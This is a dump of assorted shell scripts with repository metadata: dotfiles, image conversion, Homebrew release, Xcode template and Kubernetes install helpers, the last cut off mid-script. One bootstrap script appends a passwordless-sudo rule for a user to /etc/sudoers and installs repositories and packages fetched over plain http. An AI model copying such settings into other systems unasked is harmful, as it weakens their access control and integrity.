blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
eb704a4d1ee711f16642aec2871ae4dc150914e0
|
Shell
|
sproul/multivcs_query
|
/src.repo_parser/change_tracker.sh
|
UTF-8
| 683
| 3.359375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Usage: change_tracker.sh [-dry] json_fn1 json_fn2
#
# Given 2 JSON files containing source control version information for each of 2 packaged products, this utility will determine the source changes that occurred between these two packages and list the changed files.
cd `dirname $0`
. change_tracker.inc
ruby -wS cli_main.rb $* 2>&1 | sed -e '/warning: setting Encoding/d' -e '/: warning: Insecure world writable dir/d'
exit
bx $dp/git/change_tracker/src/change_tracker.sh
exit
bx $dp/git/change_tracker/src/change_tracker.sh -list_changes_betweenf $dp/git/change_tracker/src/public/test_cspec_set1_v2.json $dp/git/change_tracker/src/public/test_cspec_set2_v2.json
| true
|
fc26aa862b6ffd7f90bab99ae8b7fa6c15546b35
|
Shell
|
2122-5ahif-nvs/02-microproject-SpasenovicBozidar
|
/part1.sh
|
UTF-8
| 229
| 2.609375
| 3
|
[] |
no_license
|
BUILD_DIR="docs"
rm -rf -v $BUILD_DIR;
mkdir -p docs;
mkdir -p docs/images;
cp -r -p -v asciidocs/docinfo.html $BUILD_DIR;
cp -r -p -v asciidocs/*.adoc $BUILD_DIR;
cp -r -p -v asciidocs/images/* $BUILD_DIR/images;
| true
|
4a54bea0a8c172ba3b1f875f5e088344a80cbbf9
|
Shell
|
ayakix/Xcode-Template
|
/xcodeTemplate/deploy_templates.sh
|
UTF-8
| 487
| 3.125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
template_name="Custom"
cocoa_touch_template=Cocoa\ Touch\ Class.xctemplate
original_dir=/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/Library/Xcode/Templates/File\ Templates/Source/$cocoa_touch_template
custom_dir=$HOME/Library/Developer/Xcode/Templates/File\ Templates/$template_name
if [ ! -d "$custom_dir" ]; then
mkdir -p "$custom_dir"
fi
cp -r "$original_dir" "$custom_dir"
cp -r "$cocoa_touch_template" "$custom_dir"
| true
|
fad1b1020587ae44fd08bb76f74a4715b6c44534
|
Shell
|
aChanEP/nextGenImageCreation
|
/Scripts/ConvertFiles.sh
|
UTF-8
| 2,059
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
mkdir ./Images/converted
# Create the folder to store Next Gen images
mkdir ./Images/converted/jp2
mkdir ./Images/converted/webp
# mkdir ./Images/JXRFiles
mkdir ./Images/converted/Placeholders
mkdir ./Images/converted/jpg
# Go into Image directory for easier understanding
cd Images
# Loop through all images in the Image directory
for file in *; do
# This means, do not run this code on a directory, only on a file (-f)
if [[ -f $file ]]; then
fileName=$(echo $file | cut -d'.' -f 1) # something.jpg -> something
# Create placeholder and move to Placeholder folder
# These options are temporary and definitely have room for improvement
if [[ $file == *.png ]]; then
# -strip gets rid unnecessary metadata
# -quality 1 - 100, specifies image quality
# -resize creates thumbnail like images 4096@ = 64x64 16384@ 128x128
convert $file -strip -quality 1 -colors 255 -resize 4096@ ./converted/Placeholders/$fileName.png
else
convert $file -strip -quality 20 -resize 16384@ ./converted/png/$fileName.jpg
fi
# TODO: Need to make images smaller too...
# Conversion to Next Gen formats, using solely imageMagick defaults
## We need to downsize every single file...
# resize and convert to webp
convert $file -quality 100 -resize 620x620 ./converted/webp/$fileName-768w.webp
convert $file -quality 100 -resize 490x490 ./converted/webp/$fileName-1092w.webp
convert $file -quality 100 -resize 450x450 ./converted/webp/$fileName-2800w.webp
# resize and convert to jp2
convert $file -resize 620x620 ./converted/jp2/$fileName-768w.jp2
convert $file -resize 490x490 ./converted/jp2/$fileName-1092w.jp2
convert $file -resize 450x450 ./converted/jp2/$fileName-2800w.jp2
# resize and convert $file to jpg
convert $file -resize 620x620 ./converted/jpg/$fileName-768w.jpg
convert $file -resize 490x490 ./converted/jpg/$fileName-1092w.jpg
convert $file -resize 450x450 ./converted/jpg/$fileName-2800w.jpg
fi
done
# Go back down
cd ..
| true
|
9c0f4751a2c0edbdb739c373dc4becfeaf2e8e1b
|
Shell
|
sunshine2995/Weeds
|
/rc.d/bashrc
|
UTF-8
| 4,799
| 3.140625
| 3
|
[
"MIT"
] |
permissive
|
# Load bashrc on MacOS
if [ `uname` = "Darwin" ]; then
alias ls='ls -G'
fi
# Set PS1
if [ `id -u` == 0 ]; then
PS1="\[$(tput bold)\]\[$(tput setaf 1)\]\u\[$(tput sgr0)\]\[$(tput setaf 4)\]@\[$(tput sgr0)\]\[$(tput setaf 5)\]\h \[$(tput sgr0)\]\w\[$(tput bold)\]\[$(tput setaf 1)\] \\$ \[$(tput sgr0)\]"
else
PS1="\[$(tput bold)\]\[$(tput setaf 3)\]\u\[$(tput sgr0)\]\[$(tput setaf 4)\]@\[$(tput sgr0)\]\[$(tput setaf 5)\]\h \[$(tput sgr0)\]\w\[$(tput bold)\]\[$(tput setaf 4)\] \\$ \[$(tput sgr0)\]"
fi
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
alias dir='dir --color=auto'
alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
export HISTTIMEFORMAT="[%y-%m-%d_%T] "
alias grep='grep --color=auto --exclude-dir={.git,.hg,.svn}'
export GREP_COLOR='1;31'
if [ -d $HOME/.bin ]; then
export PATH=$HOME/.bin:$PATH
fi
# brew
if which brew > /dev/null; then
# BREWHOME=`brew --prefix`
BREWHOME="/usr/local"
export LDFLAGS="-L$BREWHOME/lib"
export CPPFLAGS="-I$BREWHOME/include"
export PKG_CONFIG_PATH="$BREWHOME/lib/pkgconfig"
fi
# Golang env
export GOPATH="$HOME/Golang"
export PATH="$GOPATH/bin:$PATH"
# Pyenv
export PYENV_ROOT="$HOME/.pyenv"
export PATH="$PYENV_ROOT/bin:$PATH"
if which pyenv > /dev/null; then
eval "$(pyenv init -)";
eval "$(pyenv virtualenv-init -)"
# alias
alias pyv='python --version;pyenv version'
alias chpy='pyenv global'
alias chlpy='pyenv local'
alias chgpy='pyenv global'
# func
wk () {
if [[ -d "$1" ]]; then
source $1/bin/activate
elif [[ -f "$1" ]]; then
source $1
else
echo 'Venv: No such file or directory:' $1
fi
}
fi
# Custom alias
alias l='ls -Clho'
alias ll='ls -ClhF'
alias la='ls -A'
alias rs='rsync -cvrP --exclude={.git,.hg,.svn}'
alias pweb='python -m SimpleHTTPServer'
alias psgrep='ps ax|grep -v grep|grep'
alias tree='tree -C --dirsfirst'
alias less='less -N'
alias tkill='tmux kill-session -t'
alias aria='aria2c -c -x 16'
alias myip='echo $(curl -s https://api.ipify.org)'
if [ `uname` = "Darwin" ]; then
alias tailf='tail -F'
alias rmds='find ./ | grep ".DS_Store" | xargs rm -fv'
alias showfiles="defaults write com.apple.finder AppleShowAllFiles -bool true && killall Finder"
alias hidefiles="defaults write com.apple.finder AppleShowAllFiles -bool false && killall Finder"
fi
# Python alias
alias py='python'
alias py2='python2'
alias py3='python3'
alias ipy='ipython'
alias ipy2='ipython2'
alias ipy3='ipython3'
alias pep='pep8 --ignore=E501'
alias rmpyc='find ./ | grep "py[co]$" | xargs rm -fv'
# Git alias
alias gst='git status -sb'
alias gdf='git difftool'
alias glg='git log --graph --max-count=10'
alias gco='git checkout'
alias gmg='git merge --no-commit --squash'
# pgrep && top
topgrep() {
if [ `uname` = "Darwin" ]; then
local CMD="top"
for P in $(pgrep $1); do
CMD+=" -pid $P"
done
eval $CMD
else
local CMD="top -p "
for P in $(pgrep $1); do
CMD+="$P,"
done
eval ${CMD%%,}
fi
}
# Proxy
proxy() {
if [ -z "$ALL_PROXY" ]; then
export ALL_PROXY="socks5://127.0.0.1:1080"
printf 'Proxy on\n';
else
unset ALL_PROXY;
printf 'Proxy off\n';
fi
}
# ssh gate
gfw() {
local GFW_PID=`ps ax|grep -v grep|grep 'ssh -qTfnN -D 7070 root@box'|awk '{print $1}'`
if [ ! -e $GFW_PID ]; then
kill -9 $GFW_PID
fi
ssh -qTfnN -D 7070 root@box
}
# check ip
chkip() {
local PYCODE="import sys,json;o=json.load(sys.stdin);s1='IP : %(query)s\nLoc: %(city)s / %(regionName)s / %(country)s\nPos: %(lat)s / %(lon)s';s2='IP : %(query)s\nInf: %(message)s';s=s2 if 'message' in o else s1;print(s % o);"
if [[ $# == 0 ]]; then
curl -s "http://ip-api.com/json/" | python -c "$PYCODE"
else
local IP i=0
for IP in $@; do
curl -s "http://ip-api.com/json/$IP" | python -c "$PYCODE"
((i++))
if [[ $i < $# ]]; then
echo ''
fi
done
fi
}
# enter docker container
ent() {
docker exec -it $1 /bin/bash
}
# automatic set_window_title when use screen
if [[ "$TERM" == screen* ]]; then
screen_set_window_title () {
local HPWD="$PWD"
case $HPWD in
$HOME) HPWD="~";;
$HOME/*) HPWD="~${HPWD#$HOME}";;
esac
printf '\ek%s\e\\' "$HPWD"
}
PROMPT_COMMAND="screen_set_window_title; $PROMPT_COMMAND"
fi
| true
|
92978aadd81361ccb80b9d1949e758ec21df74f6
|
Shell
|
CloudVPS/openpanel-openapp-call
|
/openapp-call
|
UTF-8
| 923
| 3.5
| 4
|
[] |
no_license
|
#!/bin/sh
# This file is part of OpenPanel - The Open Source Control Panel
# OpenPanel is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, using version 3 of the License.
#
# Please note that use of the OpenPanel trademark may be subject to additional
# restrictions. For more information, please visit the Legal Information
# section of the OpenPanel website on http://www.openpanel.com/
APP="$1"
if [ -z "$APP" ]; then
echo "Need application identifier"
exit 1
fi
SCR="$2"
if [ -z "$SCR" ]; then
echo "Need script identifier"
exit 1
fi
if [ ! -x /usr/bin/openapp-"$APP"-"$SCR" ]
then
echo "Script not found"
exit 1
fi
DATA="$3"
if [ -z "$DATA" ]; then
/usr/bin/openapp-"$APP"-"$SCR"
exit 0
else
echo "$DATA" | /usr/bin/openapp-"$APP"-"$SCR" stdin || {
echo "Call failed"
exit 1
}
fi
| true
|
07ed296d2815e4a1fdfde2211bccc899a0b68162
|
Shell
|
camuso/scripts
|
/init-my-stuff
|
UTF-8
| 11,116
| 3.828125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# init-my-stuff 1.0
# set -x
declare -i optcount=0
declare remotename
declare logfile="$HOME/.initmystuff.log"
declare repolist="rcbak hints etcbk misc ipmi"
declare b_pushpriv=false
declare b_gitrepo=true
declare clonestr
declare distro
declare installagent
declare installflags
declare fetched=false
declare majersion=
declare b_install=false
declare pkg=
echo "Installing environment on ..."
hostname
echo
while getopts hipg OPTION; do
case "$OPTION" in
h ) optcount=$((optcount+1))
;;
i ) optcount=$((optcount+1))
b_install=true
;;
p ) optcount=$((optcount+1))
b_pushpriv=true
;;
g ) optcount=$((optcount+1))
b_gitrepo=false
;;
* ) echo "unrecognized option -$OPTION"
exit 127
esac
done
shift $optcount
remotename="$1"
# ========================================================================
# To determine whether dnf or yum is the installagent, get the distro and
# version numbers.
# ------------------------------------------------------------------------
#
if [ -f /etc/os-release ]; then
foo=$(grep -w 'ID' /etc/os-release | cut -d"=" -f2)
# Strip off the double quote marks
#
foo=${foo%\"}
foo=${foo#\"}
# distro is the lowercase of the ID we pulled out of /etc/os-release
#
distro=$(echo "$foo" | tr '[:upper:]' '[:lower:]')
# ([ "$distro" == "rhel" ] || [ "$distro" == "fedora" ]) || \
# { echo "$distro is not Redhat" }
echo "Distro: $distro"
if [[ "$distro" == "fedora" ]]; then
installagent=dnf
installflags="--allowerasing --best"
elif [[ "$distro" == "rhel" ]] || [[ "$distro" == "centos" ]]; then
# Get the major version and strip off any leading double quotes
#
majversion=$(grep -w 'VERSION_ID' /etc/os-release | cut -d= -f2 | cut -d. -f1)
majversion=${majversion#\"}
majversion=${majversion%\"}
echo "majversion: $majversion"
# Determine the install agent based on the major version
#
if [ $majversion -lt 8 ]; then
installagent="yum"
installflags="--nogpgcheck --skip-broken"
else
installagent="dnf"
installflags="--allowerasing --best"
fi
elif [[ "$distro" == "ubuntu" ]]; then
installagent='apt-get'
else
echo "$distro is not a distro supported by this script."
fi
else
echo "No /etc/os-release file. Assuming distro is RHEL less than 8."
distro="rhel"
installagent="yum"
installflags="--nogpgcheck --skip-broken"
fi
# ========================================================================
# Can't go any further without which rsync and git
# ------------------------------------------------------------------------
#
$installagent install -y which
which rsync
[ $? -eq 0 ] || $installagent install -y rsync
which git
[ $? -eq 0 ] || $installagent install -y git
cd # make sure we're home
> "$logfile" # init the log file
# If we're creating a system that will have push privileges to the
# repos, then use ssh access, else use http.
# For ssh access, the user will have to add the ssh key to the github
# account.
#
$b_pushpriv && clonestr="git clone git@github.com:camuso/" \
|| clonestr="git clone https://github.com/camuso/"
# If we don't have an ssh key, generate it.
#
[ -f $HOME/.ssh/id_rsa ] || \
ssh-keygen -N "" -f $HOME/.ssh/id_rsa | tee -a "$logfile" 2>&1
echo "*******************************" | tee -a "$logfile"
echo "* Clone or update Env Files *" | tee -a "$logfile"
echo "* Version 3.0 *" | tee -a "$logfile"
echo "*******************************" | tee -a "$logfile"
echo
for repo in $repolist; do
if [ -e $repo ]; then
if [ -d "$repo"/.git ]; then
echo "Updating $repo" | tee -a "$logfile" 2>&1
cd $repo
git config pull.rebase false
git pull
cd -
else
echo "Converting directory $repo to git repo" | tee -a "$logfile" 2>&1
rm -rf $repo
$clonestr$repo.git $repo
cd $repo
git config pull.rebase false
fi
else
echo "Cloning $repo ..." | tee -a "$logfile" 2>&1
$clonestr$repo.git $repo
fi
# chown -R tcamuso.tcamuso $repo
# chmod -R u+wrx,go+rx,go-w $repo
done
echo -e "---------------" | tee -a "$logfile"
echo "*******************************" >> "$logfile" 2>&1
echo "* Clone or update bin scripts *" >> "$logfile" 2>&1
echo "*******************************" >> "$logfile" 2>&1
echo
# Update or create the bin directory.
#
if [ -d bin/.git ]; then
cd bin
echo "Updating bin repo..." | tee -a "$logfile" 2>&1
git config pull.rebase false
git pull
else
[ -e bin ] && rm -rf bin
echo "Creating bin repo..." | tee -a "$logfile" 2>&1
${clonestr}scripts.git bin
cd bin
git config pull.rebase false
fi
cd
echo "Returning to $PWD..."
echo -e "---------------\n" | tee -a "$logfile"
# Copy etc and rc files out of their archive directories into their respective
# real directories, but only if they're newer.
#
echo "************************************************" >> "$logfile" 2>&1
echo "* Copying Env files from Backup Directories *" >> "$logfile" 2>&1
echo "* but only if they're newer than existing ones *" >> "$logfile" 2>&1
echo "************************************************" >> "$logfile" 2>&1
echo >> "$logfile" 2>&1
echo "rsync contents of rcbak to home directory" | tee -a "$logfile"
rsync -Pat --cvs-exclude rcbak/ . 2>&1 | tee -a $logfile
echo -e "---------------\n" | tee -a "$logfile"
# Can only do the following if root
#
if [ $(id -u) -eq 0 ]; then
useradd tcamuso
echo 'tcamuso ALL=(ALL)NOPASSWD: ALL' >> /etc/sudoers
echo "rsync contents of etcbk to /etc" | tee -a "$logfile"
rsync -Pat --cvs-exclude etcbk/ /etc/.| tee -a "$logfile"
echo -e "---------------\n" | tee -a "$logfile"
fi
echo "************************************************" >> "$logfile" 2>&1
echo >> "$logfile" 2>&1
# If we have a "user" it's because were running remotely, so
# do the remote cleanup.
#
if [ "$remotename" ]; then
echo "*********************" >> "$logfile" 2>&1
echo "* Doing Rmote Fixup *" >> "$logfile" 2>&1
echo "*********************" >> "$logfile" 2>&1
echo "" >> "$logfile" 2>&1
bin/fixup-rsync $remotename | tee -a "$logfile"
fi
cd -
echo
# If we are running as root and install has been requested, then install
# the development tools.
#
get_rcmtools()
{
# if rcm-tools is already installed with the distro, then skip this.
[ -f /etc/yum.repos.d/rcm-tools.repo ] && return
echo -n "Installing rcm tools for " | tee -a "$logfile"
if [[ "$distro" == "fedora" ]]; then
echo "fedora" | tee -a "$logfile"
curl -k -L -o /etc/yum.repos.d/rcm-tools.repo \
http://download.devel.redhat.com/rel-eng/internal/rcm-tools-fedora.repo \
| tee -a "$logfile"
return
fi
case "$majversion" in
"6" ) echo "$distro-6" | tee -a "$logfile"
curl -k -L -o /etc/yum.repos.d/rcm-tools.repo \
http://download.devel.redhat.com/rel-eng/RCMTOOLS/rcm-tools-rhel-6-server.repo
return 0
;;
"7" ) echo "$distro-7" | tee -a "$logfile"
curl -k -L -o /etc/yum.repos.d/rcm-tools.repo \
http://download.devel.redhat.com/rel-eng/RCMTOOLS/rcm-tools-rhel-7-server.repo
return 0
;;
"8" ) echo "$distro-8" | tee -a "$logfile"
curl -k -L -o /etc/yum.repos.d/rcm-tools.repo \
http://download.devel.redhat.com/rel-eng/RCMTOOLS/rcm-tools-rhel-8-baseos.repo
curl -k -L -o /etc/yum.repos.d/kernel-devtools.repo \
https://copr.fedorainfracloud.org/coprs/bmeneguele/rhkernel-devtools/repo/epel-8/bmeneguele-rhkernel-devtools-epel-8.repo
return 0
;;
"9" ) echo "$distro for RHEL-9" | tee -a "$logfile"
curl -k -L -o /etc/yum.repos.d/rcm-tools.repo \
http://download.eng.brq.redhat.com/rel-eng/internal/rcm-tools-rhel-9-baseos.repo
curl -k -L -o /etc/yum.repos.d/kernel-devtools.repo \
https://copr.fedorainfracloud.org/coprs/bmeneguele/rhkernel-devtools/repo/epel-8/bmeneguele-rhkernel-devtools-epel-8.repo
return 0
;;
esac
echo ""
return 1
}
get_epel() {
echo -n "Installing EPEL for " | tee -a "$logfile"
case "$majversion" in
"6" ) echo "$distro-6" | tee -a "$logfile"
yum install -y https://archives.fedoraproject.org/pub/archive/epel/6/x86_64/epel-release-6-8.noarch.rpm
return 0
;;
"7" ) echo "$distro-7" | tee -a "$logfile"
yum install -y https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm
return 0
;;
"8" ) echo "$distro-8" | tee -a "$logfile"
dnf install -y https://dl.fedoraproject.org/pub/epel/epel-release-latest-8.noarch.rpm
return 0
;;
"9" ) echo "$distro-8 for $distro-9" | tee -a "$logfile"
dnf install -y https://dl.fedoraproject.org/pub/epel/epel-release-latest-9.noarch.rpm
return 0
;;
esac
echo | tee -a "$logfile"
return 1
}
get_certs()
{
# If rcm tools are already installed, favor them over the downloaded ones.
#
local b_rcmsaved=false
if [ -f /etc/yum.repos.d/rcm-tools.repo ]; then
mv /etc/yum.repos.d/rcm-tools.repo /etc/yum.repos.d/rcm-tools.repo.save
b_rcmsaved=true
fi
which wget
[ $? -eq 0 ] || yum install -y wget
# install the RH certs
# See: https://docs.engineering.redhat.com/display/RCMDOC/RCM+Tools+Release+Guide#RCMToolsReleaseGuide-Installredhat-internal-cert-installrpm
#
~/bin/install-rhit-cert
$b_rcmsaved && \
mv /etc/yum.repos.d/rcm-tools.repo.save /etc/yum.repos.d/rcm-tools.repo
}
if $b_install && [ "$remotename" == "root" ]; then
declare arch=$(uname -m)
declare rcmurl=""
declare installagent=""
get_certs
get_rcmtools
dnf copr enable -y bmeneguele/rhkernel-devtools
if [ "$distro" == "fedora" ]; then
installagent=dnf
dnf copr enable -y james/centpkg
dnf install -y fedpkg rhel-packager centpkg-sig
fi
if [[ "$distro" == "rhel" ]] || [[ "$distro" == "centos" ]]; then
get_epel
installagent=yum
fi
# $installagent groupinstall -y 'X Window System' 'GNOME'
$installagent group install -y "Development Tools"
for pkg in \
annobin-annocheck \
automake \
annobin \
annobin-annocheck \
centpkg \
elfutils-libelf-devel \
gcc \
gcc-c++ \
go \
bc \
bind-utils \
bison \
brewkoji \
ca-certificates \
cmake \
conserver-client \
cscope \
dwarves libdwarves1 \
elfutils-devel elfutils-libs elfutils-libelf \
elinks \
ethtool \
flex \
git-email \
golang \
hostname \
ipmitool \
kmod \
kmod-libs \
krb5-workstation krb5-libs \
lab \
libdwarf libdwarf-devel \
lynx \
make \
mutt \
ncurses ncurses-devel \
net-tools \
nmap \
OpenIPMI \
openssl openssl-devel \
patch patchutils \
perl \
pv \
python-bugzilla-cli \
rhpkg \
rpm-build \
rsync \
texinfo \
tpm-tools \
usbutils \
vim vim-enhanced vim-filesystem \
watchdog \
waiverdb-cli \
xclip \
xorg-x11-apps \
xz \
zenity \
; do
$installagent install -y $installflags $pkg \
2>&1 | tee -a $logfile
done
# orphaned packages
#
# trousers trousers-devel \
# koji \
# http://dl.fedoraproject.org/pub/epel/7/x86_64/q/quilt-0.63-2.el7.noarch.rpm
# vim-powerline \
# krb5-auth-dialog \
# kmodtool \
# python-bugzilla \
# git-lab-porcelain \
fi
# We're gonna quit here, because we need to create the /work mountpoint as a logical
# volume. For that, we will use mkworkdir interactively.
# The creation of the repos will be done separately at command line of the new
# system.
#
exit 0
| true
|
3e6dbde7138648f9c51105534749ca76ea6feb85
|
Shell
|
snsinfu/dotfiles
|
/.zsh/init.zsh
|
UTF-8
| 767
| 3.765625
| 4
|
[] |
no_license
|
ZSHRC_ROOT="${${(%):-%x}:a:h}"
source "${ZSHRC_ROOT}/rc.zsh"
source "${ZSHRC_ROOT}/plugin.zsh"
zshrc() {
local subcommand=help
if [ $# -gt 0 ]; then
subcommand=$1
shift 1
fi
case "${subcommand}" in
plugin)
__zshrc::plugin::plugin "$@"
;;
update)
__zshrc::plugin::update
__zshrc::rc::reload
;;
reload)
__zshrc::rc::reload
;;
help)
__zshrc::help
;;
*) echo "unrecognized subcommand: ${subcommand}" >&2
return 1
esac
}
__zshrc::help() {
<< EOS
zshrc plugin <origin> - install plugin
zshrc update - update all plugins
zshrc reload - reload .zshrc
zshrc help - print this message
EOS
}
__zshrc::rc::rc
| true
|
db8238c04b184d0ffbedf00cf2873c6359415063
|
Shell
|
michaelaguiar/dotfiles
|
/.macos
|
UTF-8
| 3,933
| 3.375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Close any open System Preferences panes
osascript -e 'tell application "System Preferences" to quit'
# Ask for the administrator password upfront
sudo -v
# Keep-alive: update existing `sudo` time stamp until `.macos` has finished
while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null &
###############################################################################
# General UI/UX #
###############################################################################
# Set computer name (as done via System Preferences โ Sharing)
sudo scutil --set ComputerName "Ghost"
sudo scutil --set HostName "Ghost"
sudo scutil --set LocalHostName "Ghost"
###############################################################################
# Software Update #
###############################################################################
# System Preferences > Software Update > Advanced > Automatically: Check for updates
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticCheckEnabled -bool true
# System Preferences > Software Update > Advanced > Automatically: Download new updates when available
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticDownload -bool true
# System Preferences > Software Update > Advanced > Automatically: Install macOS updates
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticallyInstallMacOSUpdates -bool true
# System Preferences > Software Update > Advanced > Automatically: Install app updates from the App Store
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate AutoUpdate -bool true
# System Preferences > Software Update > Advanced > Automatically: Install system data files and security updates
sudo defaults write /Library/Preferences/com.apple.SoftwareUpdate CriticalUpdateInstall -bool true
###############################################################################
# Dock & Menu Bar #
###############################################################################
# System Preferences > Dock & Menu Bar > Automatically hide and show the Dock
defaults write com.apple.dock autohide -bool true
###############################################################################
# Mission Control #
###############################################################################
# System Preference > Mission Control > Automatically rearrange Spaces based on most recent use
defaults write com.apple.dock mru-spaces -bool false
###############################################################################
# Finder #
###############################################################################
# Desktop > Show View Options > Stack By: Kind
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:GroupBy Kind" ~/Library/Preferences/com.apple.finder.plist
# Desktop > Show View Options > Sort By: Name
/usr/libexec/PlistBuddy -c "Set :DesktopViewSettings:IconViewSettings:arrangeBy name" ~/Library/Preferences/com.apple.finder.plist
# Finder > Show View Options > Sort By: Name
/usr/libexec/PlistBuddy -c "Set :StandardViewSettings:IconViewSettings:arrangeBy name" ~/Library/Preferences/com.apple.finder.plist
###############################################################################
# Kill affected applications #
###############################################################################
for app in "Dock" "Finder"; do
echo "Killing ${app}"
killall "${app}" &> /dev/null
done
echo "Done. Note that some of these changes require a logout/restart to take effect."
| true
|
d775da17494c0bfddba147efb3d9122ba09f5474
|
Shell
|
777777777777777777777777777777/slackalamp
|
/mariadb.sh
|
UTF-8
| 476
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
DATA=/var/lib/mysql
if [ ! -f /etc/my.cnf ]; then
cat > /etc/my.cnf <<EOF
[server]
basedir=/usr
datadir=/etc
plugin-dir=/usr/lib64/mysql/plugin
user=mysql
EOF
fi
if [ ! -d ${DATA}/mysql ]; then
# some settings
echo "setting"
mysql_install_db --defaults-extra-file=/etc/my.cnf
chown mysql:mysql -Rv ${DATA}
fi
#start
exec mysqld_safe --defaults-extra-file=/etc/my.cnf --pid-file=/var/run/mysql/mysql.pid
#after exec
#mysqladmin -u root password '12345678'
| true
|
0287e2ea9998d2cf046e66fcb2da2aa509f0f1b7
|
Shell
|
dkundel/danger-js
|
/scripts/create-homebrew-tap-pr.sh
|
UTF-8
| 1,043
| 3.5
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
[ -z ${VERSION+x} ] && { echo "VERSION is missing"; exit 1; }
FILE=brew-distribution/danger-macos.zip
if [ ! -f ${FILE} ]; then
echo ${FILE} not found!
exit 1
fi
SHA=$(shasum -a 256 ${FILE} | cut -f 1 -d " ")
echo "$SHA"
# Clone tap repo
HOMEBREW_TAP_TMPDIR=$(mktemp -d)
git clone --depth 1 git@github.com:danger/homebrew-tap.git "$HOMEBREW_TAP_TMPDIR"
cd "$HOMEBREW_TAP_TMPDIR" || exit 1
# git config user.name danger
# git config user.email danger@users.noreply.github.com
# Write formula
echo "class DangerJs < Formula" > danger-js.rb
echo " homepage \"https://github.com/danger/danger-js\"" >> danger-js.rb
echo " url \"https://github.com/danger/danger-js/releases/download/${VERSION}/danger-macos.zip\"" >> danger-js.rb
echo " sha256 \"${SHA}\"" >> danger-js.rb
echo >> danger-js.rb
echo " def install" >> danger-js.rb
echo " bin.install \"danger\"" >> danger-js.rb
echo " end" >> danger-js.rb
echo "end" >> danger-js.rb
# Commit changes
git add danger-js.rb
git commit -m "Releasing danger-js version ${VERSION}"
git push origin master
| true
|
71b5974dd6656c281902cedd835ab79206be815b
|
Shell
|
afloresv/nnc
|
/fold
|
UTF-8
| 438
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/bash
listAlg=( CNN NET FCNN MSS VSS RSS 0.1-RSS 0.5-RSS 1-RSS HSS 0.1-HSS 0.5-HSS 1-HSS)
echo -e "alg\tfile\tfold\tsize\terror\tcdmin\tcdq1\tcdmed\tcdq3\tcdmax\tcdavg\ttime"
for file in `ls dataset/synthetic/v-*.txt dataset/uci/*.txt`
do
f=$(basename $file .txt)
>&2 echo ">>> $f"
for alg in ${listAlg[*]}
do
>&2 echo " $alg"
for i in {0..9}
do
echo -en "$alg\t$f\t$i\t"
./NNC $alg $file $i
done
done
done
| true
|
93d32a3469ad7dfa7f2333203dcb83cb753b038a
|
Shell
|
yuanzhang/k8s
|
/k8s/bin/master_install.sh
|
UTF-8
| 2,257
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
if [[ $# < 1 ]]
then
echo "run as: sh master_install.sh 'https:\/\/172.17.77.90:2379,https:\/\/172.17.181.176:2379,https:\/\/172.17.181.177:2379' "
echo "params 1: etcd servers"
exit
fi
## ็ๆ้
็ฝฎๆไปถ
sh install/config_install.sh
## ๆท่ด้
็ฝฎๅฐ/etc/kubernetes
ETCD_SERVERS=$1
HOSTNAME=`hostname`
LOCAL_IP=`ifconfig eth0|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d "addr:"`
MASTER_IP=${LOCAL_IP}
ETC=../etc/etc-kubernetes
TMP_DIR=master_tmp
API_SERVER=${ETC}/apiserver
TMP_API_SERVER=${TMP_DIR}/apiserver
CONTROLLER_MAN=${ETC}/controller-manager
TMP_CONTROLLER_MAN=${TMP_DIR}/controller-manager
KUBELET=${ETC}/kubelet
TMP_KUBELET=${TMP_DIR}/kubelet
PROXY=${ETC}/proxy
TMP_PROXY=${TMP_DIR}/proxy
SCHEDULER=${ETC}/scheduler
TMP_SCHEDULER=${TMP_DIR}/scheduler
CONFIG=${ETC}/config
TMP_CONFIG=${TMP_DIR}/config
rm -rf ${TMP_DIR}
mkdir ${TMP_DIR}
cp ${API_SERVER} ${TMP_DIR}/
cp ${CONTROLLER_MAN} ${TMP_DIR}/
cp ${KUBELET} ${TMP_DIR}/
cp ${PROXY} ${TMP_DIR}/
cp ${SCHEDULER} ${TMP_DIR}/
cp ${CONFIG} ${TMP_DIR}/
sed -i "s/{\$BIND_ADDRESS}/${LOCAL_IP}/g" ${TMP_API_SERVER}
sed -i "s/{\$ETCD_SERVERS}/${ETCD_SERVERS}/g" ${TMP_API_SERVER}
sed -i "s/{\$MASTER}/${MASTER_IP}/g" ${TMP_CONTROLLER_MAN}
sed -i "s/{\$HOSTNAME}/${HOSTNAME}/g" ${TMP_KUBELET}
sed -i "s/{\$BIND_ADDRESS}/${LOCAL_IP}/g" ${TMP_PROXY}
sed -i "s/{\$MASTER_IP}/${MASTER_IP}/g" ${TMP_CONFIG}
cp ${TMP_DIR}/* /etc/kubernetes/ -rf
rm -rf ${TMP_DIR}
## keyๆไปถ
KEY_DIR=../key
